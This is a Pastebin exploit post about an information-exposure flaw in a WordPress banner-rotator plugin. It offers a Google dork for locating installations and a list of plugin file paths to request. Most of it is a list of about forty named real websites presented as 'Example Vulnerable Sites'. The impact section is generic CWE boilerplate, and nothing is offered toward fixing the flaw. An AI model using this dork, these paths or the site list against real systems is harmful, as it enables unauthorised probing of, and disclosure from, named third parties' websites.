Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###############################################################################
- # Exploit Title : WordPress all_in_one_bannerRotator Plugins 4.9.9 File Information Exposure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/01/2019
- # Vendor Homepage : lambertgroupproductions.com ~ responsivejqueryslider.com
- # Software Download Link : downloads.wordpress.org/plugin/all-in-one-slider.zip
- # Software Information Links : responsivejqueryslider.com/banner_rotator.html
- + responsivejqueryslider.com/wordpressplugin/banner_rotator_responsive.html
- + codecanyon.net/item/all-in-one-slider-responsive-jquery-slider-plugin/1534434?ref=LambertGroup
- + lambertgroupproductions.com/portfolio_page/one-slider-responsive-jquery-slider-plugin/
- # Software Price : 11$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Affected Versions : 1.1 - 3. 0 - 3.2 - 3.5.0 - 4.7.12 - 4.9.9
- # Exploit Risk : High
- # Google Dorks : inurl:"/wp-content/plugins/all_in_one_bannerRotator/"
- # Vulnerability Type : CWE-200 [ Information Exposure ]
- CWE-538 [ File and Directory Information Exposure ]
- CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
- ###############################################################################
- # Impact :
- ***********
- * WordPress all_in_one_bannerRotator Plugins 4.9.9 and other versions is prone to an arbitrary file disclosure
- vulnerability because it fails to properly sanitize user-supplied input.
- * An attacker can exploit this vulnerability to view local files in the context of the web server process,
- which may aid in launching further attacks.
- * An information exposure is the intentional or unintentional disclosure
- of information to an actor that is not explicitly authorized to have access to that information.
- * The product stores sensitive information in files or directories that are accessible
- to actors outside of the intended control sphere.
- * The software uses external input to construct a pathname that is intended to identify a file or
- directory that is located underneath a restricted parent directory, but the software does not
- properly neutralize special elements within the pathname that can cause the pathname
- to resolve to a location that is outside of the restricted directory.
- ###############################################################################
- # Video Tutorials =>
- *******************
- Step 1: Installation – youtube.com/watch?v=D8rQdXzEz0o
- Step 2: Manage Images – youtube.com/watch?v=ULrPCuP0rnQ
- Step 3: Manage Text Over Image – youtube.com/watch?v=4KqgWBmx8RA
- Step 4: Manage Multiple Banners – youtube.com/watch?v=y2wnD3hUdus
- ###############################################################################
- # Exploit :
- *************
- /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php?page=all_in_one_bannerRotator_Manage_Banners
- /wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/banners.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/help.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Add_New
- /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Manage_Banners
- /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Help
- /wp-content/plugins/all_in_one_bannerRotator/tpl/playlist.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php?page=all_in_one_bannerRotator_Playlist
- /wp-content/plugins/all_in_one_bannerRotator/tpl/playlist_elements_over_image.php
- /wp-content/plugins/all_in_one_bannerRotator/tpl/preview.html
- /wp-content/plugins/all_in_one_bannerRotator/tpl/settings_form.php
- ###############################################################################
- # Example Vulnerable Sites :
- ****************************
- [+] amf-lebanon.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php
- [+] hotel-le-verseau.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] wolfetours.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] sklawfirm.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] ecolestetiennedeseaux.fr/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] warrentonfamilydentistry.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] icaran.cl/headhunters/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] oha.net.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] neostrata.ie/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] dash.gr/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] mydebtadvisors.com/dev/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] downtoearthlawn.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] marketingdepartmentinc.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] veepraces.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] mvucc.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] thebutlerschool.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] mckannafabs.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] susanelanjones.co.uk/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] animalrepro.com/wp-content/plugins/all_in_one_bannerRotator//tpl/add_banner.php
- [+] carh.org/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] orsrents.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] trechomes.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] primepowdercoating.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] baystateconsultants.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] cardiff-lift.co.uk/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] triplesservices.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] homeleisure.com.au/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] perryverroneroofing.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] emmaswebsite.com.au/esh/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] viatorians.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] avantec.se/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] bodycorpservices.co.nz/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] ultrafin.co.za/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] smartindia.co.in/influx/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] lejagroup.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] vibrantjersey.je/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] casadovelhodragoeiro.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] triplesservices.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- [+] pegasostravel.com/wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
- ###############################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement